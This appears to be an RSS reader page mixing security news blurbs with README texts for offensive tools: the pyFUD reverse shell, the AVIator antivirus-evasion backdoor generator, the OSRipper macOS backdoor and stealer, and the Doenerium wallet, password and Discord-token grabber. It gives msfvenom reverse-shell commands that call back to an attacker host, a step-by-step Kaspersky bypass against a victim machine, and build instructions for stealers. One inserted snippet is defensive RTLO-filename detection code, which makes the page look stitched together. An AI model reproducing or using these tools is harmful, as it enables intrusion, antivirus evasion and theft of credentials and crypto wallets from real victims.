FreshRSS


LummaC2 Malware Deploys New Trigonometry-Based Anti-Sandbox Technique

The stealer malware known as LummaC2 (aka Lumma Stealer) now features a new anti-sandbox technique that leverages the mathematical principle of trigonometry to evade detection and exfiltrate valuable information from infected hosts. The method is designed to "delay detonation of the sample until human mouse activity is detected," Outpost24 security researcher Alberto Marín said in a technical

Cybercriminals Using New ASMCrypt Malware Loader to Fly Under the Radar

Threat actors are selling a new crypter and loader called ASMCrypt, which has been described as an "evolved version" of another loader malware known as DoubleFinger. "The idea behind this type of malware is to load the final payload without the loading process or the payload itself being detected by AV/EDR, etc.," Kaspersky said in an analysis published this week. DoubleFinger was first

pyFUD - Multi Clients FUD Reverse Shell

By: Zion3R

python3 based multi clients reverse shell.


Warning:

1. Don't upload any payloads to VirusTotal.com, because the tool will stop working over time.
2. VirusTotal shares signatures with AV companies.
3. Again, don't be an idiot!

Installation:

1. git clone https://github.com/machine1337/pyFUD
2. python3 server.py (enter your IP and port and start the server)
3. client.py (edit IP and PORT to put in your own IP and port)

Usage:

1. python3 server.py
2. Now compile client.py to an exe (make sure you change the IP and port in it first)

Features:

1. Very simple and fully undetectable reverse shell
2. Multi-client handling
3. Persistent shell
4. Auto-reconnect
5. You can convert client.py to an exe using the pyinstaller tool on Windows.

Warning:

Use this tool only for educational purposes. I will not be responsible for your cruel acts.


AVIator - Antivirus Evasion Project


AVIator ported to .NET Core 5 with an updated UI


AV|Ator

About://name

AV: AntiVirus

Ator: a swordsman, alchemist, scientist, magician, scholar, and engineer, with the ability to sometimes produce objects out of thin air (https://en.wikipedia.org/wiki/Ator)

About://purpose

AV|Ator is a backdoor generator utility, which uses cryptographic and injection techniques in order to bypass AV detection. More specifically:

  • It uses AES encryption to encrypt a given shellcode
  • It generates an executable file which contains the encrypted payload
  • The shellcode is decrypted and injected on the target system using various injection techniques

[https://attack.mitre.org/techniques/T1055/]:

  1. Portable executable injection which involves writing malicious code directly into the process (without a file on disk) then invoking execution with either additional code or by creating a remote thread. The displacement of the injected code introduces the additional requirement for functionality to remap memory references. Variations of this method such as reflective DLL injection (writing a self-mapping DLL into a process) and memory module (map DLL when writing into process) overcome the address relocation issue.

  2. Thread execution hijacking which involves injecting malicious code or the path to a DLL into a thread of a process. Similar to Process Hollowing, the thread must first be suspended.


Usage

The application has a form which consists of three main inputs (see screenshot below):

  1. A text containing the encryption key used to encrypt the shellcode
  2. A text containing the IV used for AES encryption
  3. A text containing the shellcode

Important note: The shellcode should be provided as a C# byte array.

The default values contain shellcode that executes notepad.exe (32-bit). This demo is provided as an indication of how the input should be formed (with msfvenom this is easily done using the -f csharp switch, e.g. msfvenom -p windows/meterpreter/reverse_tcp LHOST=X.X.X.X LPORT=XXXX -f csharp).

After filling in the inputs and selecting the output path, an executable is generated according to the chosen options.

RTLO option

In simple words, the Right-to-Left Override option spoofs an executable file so that it appears to have an "innocent" extension like 'pdf', 'txt', etc. E.g. the file "testcod.exe" will be displayed as "tesexe.doc".

Beware of the fact that some AVs flag the spoof itself as malware.
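From the defender's side, the RTLO trick is easy to spot because the Unicode bidirectional control characters never belong in a legitimate filename. The following Python is an added example (not part of AVIator or this page) that scans filenames for those characters, reconstructs what a naive viewer would display, and compares that with the extension the OS actually uses. The sample filenames, including the page's "testcod.exe" example with the override inserted after "tes", are constructed for the demonstration.

```python
import unicodedata

# Unicode bidirectional embeddings, overrides and isolates. U+202E is the
# classic "RTLO" character; the others can be abused the same way, so a
# filename scanner should reject the whole set, not just U+202E.
BIDI_CONTROLS = frozenset(
    "\u202a\u202b\u202c\u202d\u202e"   # LRE, RLE, PDF, LRO, RLO
    "\u2066\u2067\u2068\u2069"         # LRI, RLI, FSI, PDI
)


def find_bidi_controls(name):
    """Return (index, unicode name) for every bidi control character in name."""
    return [(i, unicodedata.name(ch)) for i, ch in enumerate(name) if ch in BIDI_CONTROLS]


def displayed_name(name):
    """Approximate what a bidi-unaware file listing shows for name.

    Assumption (simplification): only the first U+202E is honoured, and all
    text after it is rendered reversed; nested embeddings are not modelled.
    """
    idx = name.find("\u202e")
    if idx < 0:
        return name
    return name[:idx] + name[idx + 1:][::-1]


def real_extension(name):
    """Extension the OS uses: text after the last '.' once controls are dropped."""
    stripped = "".join(ch for ch in name if ch not in BIDI_CONTROLS)
    return stripped.rsplit(".", 1)[-1].lower() if "." in stripped else ""


def assess(name):
    """Classify one filename; any bidi control present is treated as suspicious."""
    controls = find_bidi_controls(name)
    shown = displayed_name(name)
    shown_ext = shown.rsplit(".", 1)[-1].lower() if "." in shown else ""
    real_ext = real_extension(name)
    return {
        "raw": name,
        "displayed": shown,
        "displayed_extension": shown_ext,
        "real_extension": real_ext,
        "controls": controls,
        # Suspicious if any control is present; the extension mismatch is the
        # reason a human would care, so report it separately.
        "suspicious": bool(controls),
        "extension_mismatch": bool(controls) and shown_ext != real_ext,
    }


def scan(names):
    """Return the assessments for every suspicious filename in names."""
    return [r for r in (assess(n) for n in names) if r["suspicious"]]


# Constructed sample listing: two clean names and two RTLO-spoofed executables.
SAMPLE_FILES = [
    "report.pdf",
    "notes.txt",
    "tes\u202ecod.exe",        # the page's example: displays as tesexe.doc
    "invoice\u202efdp.exe",    # displays as invoiceexe.pdf
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_FILES):
        print(f"{hit['displayed']!r} is really .{hit['real_extension']} "
              f"(controls at {hit['controls']})")
```

Run over a real directory listing (os.listdir or an EDR file-creation log), the same check gives a high-confidence, low-noise signal: unlike signature-based detection of the payload, it does not depend on what is inside the file.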

Set custom icon

I guess you all know what it is :)

Bypassing Kaspersky AV on a Win 10 x64 host (TEST CASE)

Getting a shell on a Windows 10 machine running fully updated Kaspersky AV

Target Machine: Windows 10 x64

  1. Create the payload using msfvenom

    msfvenom -p windows/x64/shell/reverse_tcp_rc4 LHOST=10.0.2.15 LPORT=443 EXITFUNC=thread RC4PASSWORD=S3cr3TP4ssw0rd -f csharp

  2. Use AVIator with the following settings

    Target OS architecture: x64

    Injection Technique: Thread Hijacking (Shellcode Arch: x64, OS arch: x64)

    Target procedure: explorer (leave the default)

  3. Set the listener on the attacker machine

  4. Run the generated exe on the victim machine

Installation

Windows:

Either compile the project or download the already compiled executable from the following folder:

https://github.com/Ch0pin/AVIator/tree/master/Compiled%20Binaries

Linux:

Install Mono according to your Linux distribution, then download and run the binaries.

e.g. on Kali:

   root@kali# apt install mono-devel
   root@kali# mono aviator.exe

Credits

To Damon Mohammadbagher for the encryption procedure

Disclaimer

I developed this app in order to overcome the demanding challenges of the pentest process, and this is the ONLY WAY that this app should be used. Make sure that you have the required permission to use it against a system, and never use it for illegal purposes.



OSRipper - AV Evading OSX Backdoor And Crypter Framework


OSRipper is a fully undetectable backdoor generator and crypter which specialises in OSX M1 malware. It will also work on Windows, but for now there is no support for it and it IS NOT FUD for Windows (yet, at least), and for now I will not focus on Windows.

You can also PM me on Discord for support or to ask for new features: SubGlitch1#2983


Features

  • FUD (for macOS)
  • Cloaks as an official app (Microsoft, ExpressVPN etc.)
  • Dumps sys info, browser history, logins, ssh/aws/azure/gcloud creds, clipboard content, local users etc. (more on Cedric Owens' swiftbelt)
  • Encrypted communications
  • Rootkit-like behaviour
  • Every backdoor generated is entirely unique

Description

Please check the wiki for information on how OSRipper functions (it changes extremely frequently):

https://github.com/SubGlitch1/OSRipper/wiki

Here are example backdoors which were generated with OSRipper:

[Screenshot: macOS .apps will look like this on VT]

Getting Started

Dependencies

You need Python. If you do not wish to download Python you can download a compiled release. The Python dependencies are specified in the requirements.txt file.

Since version 1.4 you will need Metasploit installed and on PATH so that it can handle the Meterpreter listeners.

Installing

Linux

apt install git python -y
git clone https://github.com/SubGlitch1/OSRipper.git
cd OSRipper
pip3 install -r requirements.txt

Windows

git clone https://github.com/SubGlitch1/OSRipper.git
cd OSRipper
pip3 install -r requirements.txt

or download the latest release from https://github.com/SubGlitch1/OSRipper/releases/tag/v0.2.3

Executing program

Only this

sudo python3 main.py

Contributing

Please feel free to fork and open pull requests. Suggestions and criticism are appreciated as well.

Roadmap

v0.1

  • ✅Get down detection to 0/26 on antiscan.me
  • ✅Add Changelog
  • ✅Daemonise Backdoor
  • ✅Add Crypter
  • ✅Add More Backdoor templates
  • ✅Get down detection to at least 0/68 on VT (for mac malware)

v0.2

  • ✅Add AntiVM
  • [] Implement tor hidden services
  • ✅Add Logger
  • ✅Add Password stealer
  • [] Add KeyLogger
  • ✅Add some new evasion options
  • ✅Add SilentMiner
  • [] Make proper C2 server

v0.3

Coming soon

Help

Just open an issue and I'll make sure to get back to you.

Changelog

  • 0.2.1
    • OSRipper will now pull all information from the target and send it to the C2 server over sockets. This includes browser history, passwords, system information, keys, etc.
  • 0.1.6
    • The process will now trojanise itself as com.apple.system.monitor and drop to /Users/Shared
  • 0.1.5
    • Added crypter
  • 0.1.4
    • Added 4th module
  • 0.1.3
    • Got detection on VT down to 0. Made the process invisible
  • 0.1.2
    • Added 3rd module and listener
  • 0.1.1
    • Initial release

License

MIT

Acknowledgments

Inspiration, code snippets, etc.

Support

I am very sorry to even write this here, but my finances are not looking good right now. If you appreciate my work I would really be happy about any donation. You do NOT have to; this is solely optional.

BTC: 1LTq6rarb13Qr9j37176p3R9eGnp5WZJ9T

Disclaimer

I am not responsible for what is done with this project. This tool is solely written to be studied by other security researchers to see how easy it is to develop macOS malware.



Researchers Detail Evasive DarkTortilla Crypter Used to Deliver Malware

A .NET-based evasive crypter named DarkTortilla has been used by threat actors to distribute a broad array of commodity malware as well as targeted payloads like Cobalt Strike and Metasploit, likely since 2015. "It can also deliver 'add-on packages' such as additional malicious payloads, benign decoy documents, and executables," cybersecurity firm Secureworks said in a Wednesday report. "It

Doenerium - Fully Undetected Grabber (Grabs Wallets, Passwords, Cookies, Modifies Discord Client Etc.)


Fully Undetected Grabber (Grabs Wallets, Passwords, Cookies, Modifies Discord Client Etc.)

Features

Stealer

  • Discord Token
  • Discord Info - Username, Phone number, Email, Billing, Nitro Status & Backup Codes
  • Discord Friends with rare badges
  • Grabs crypto wallets
    • Zcash
    • Armory
    • Bytecoin
    • Jaxx
    • Exodus
    • Ethereum
    • Electrum
    • AtomicWallet
    • Guarda
    • Coinomi
  • Browser (Chrome, Opera, Firefox, OperaGX, Edge, Brave, Yandex) - passwords, cookies, autofill & history (searches them for specific keywords such as PayPal, Coinbase etc.)
  • Screenshot(s)
  • Injects itself into Discord to grab the token when it changes


Additional

  • Crypto Clipper - BTC, LTC, XMR, ETH, XRP, NEO, BCH, DOGE, DASH, XLM
  • Ultra Obfuscation (use https://obfuscator.io)
  • Anti-Debug
  • Anti-VM
  • Validates a found Discord token and then sends it to your Discord webhook
  • Sends all files to your Discord webhook in beautiful embeds and a structured zip file


Screenshots

[Screenshots omitted]

Setting Up

Install Node.js.

Install Visual Studio with the C++ compilers and all components enabled (it is a few GB, but you won't get build errors).

Run the install.bat file to install all necessary files.

Replace WEBHOOK with your webhook in config.js.

Run build.bat and wait for doenerium-win.exe to be built.

Todo

  • Exodus wallet injection (get the password whenever the user logs in to the wallet)
  • More grabbers (VPNs, gaming, messengers)
  • Keylogger
  • Growtopia stealer
  • Discord bot to build within discord ($build <webhook_url>)
  • Dynamic encryption

License

By downloading this, you agree to the Commons Clause license and that you're not allowed to sell this repository or any code from this repository. For more info see commonsclause.

Note

There is no official Telegram server for this project. I don't own t.me/doenerium.

I am not responsible for any damages this software may cause. This was made for personal education.

Credits

Credits to Pandoric / PandoricGalaxy for creating this beautiful README file


